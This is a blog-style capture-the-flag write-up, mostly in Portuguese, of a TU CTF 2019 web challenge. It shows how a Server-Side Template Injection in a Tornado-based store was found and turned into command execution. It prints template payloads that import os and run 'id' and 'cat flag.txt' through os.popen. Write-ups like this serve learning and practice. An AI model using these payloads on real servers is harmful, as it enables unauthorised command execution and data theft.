And Now, For Something Completely Different

Category: Web

Description:

We all know Black Friday is the time for shopping. Can you find us a flag on this online store?

chall.tuctf.com:30007

Solve:

Acessando o link: Analisando o código fonte encontramos um diretório: E, acessando o “/welcome/test”, temos: Depois de testar alguns payloads, cheguei ao Server-Side Template Injection (SSTI) com o payload :

{ {7*7} }

E descobri que estava rodando Tornado no servidor, pois em um dos payloads que eu testei me foi retornado um erro com o path do Tornado e assim procurei outros payloads para o Tornado.Usei:

{ % import os % } { { os.popen("id").read() }}

E assim, obti a flag com o payload:

{ % import os % } { {os.popen( "cat flag.txt" ).read()}}

Flag:

TUCTF{4lw4y5_60_5h0pp1n6_f0r_fl465}

Posts

Execute-No-Evil---X-MAS-2019.md

Test-Test-Test---TU-CTF-2019.md

Router-Where-Art-Thou---TU-CTF-2019.md

OpenDoor---TU-CTF-2019.md

Sonic---TU-CTF-2019.md

Something-in-Common---TU-CTF-2019.md

Runme---TU-CTF-2019.md

Faker---TU-CTF-2019.md

Cute-Animals-Company---TU-CTF-2019.md

And-Now,-For-Something-Completely-Different---TU-CTF-2019.md

And Now, For Something Completely Different - TU CTF 2019

Description:

Solve:

Flag:

Comments

Posts

Execute-No-Evil---X-MAS-2019.md

Test-Test-Test---TU-CTF-2019.md

Router-Where-Art-Thou---TU-CTF-2019.md

OpenDoor---TU-CTF-2019.md

Sonic---TU-CTF-2019.md

Something-in-Common---TU-CTF-2019.md

Runme---TU-CTF-2019.md

Faker---TU-CTF-2019.md

Cute-Animals-Company---TU-CTF-2019.md

And-Now,-For-Something-Completely-Different---TU-CTF-2019.md

And Now, For Something Completely Different - TU CTF 2019

Description:

Solve:

Flag:

Share

Comments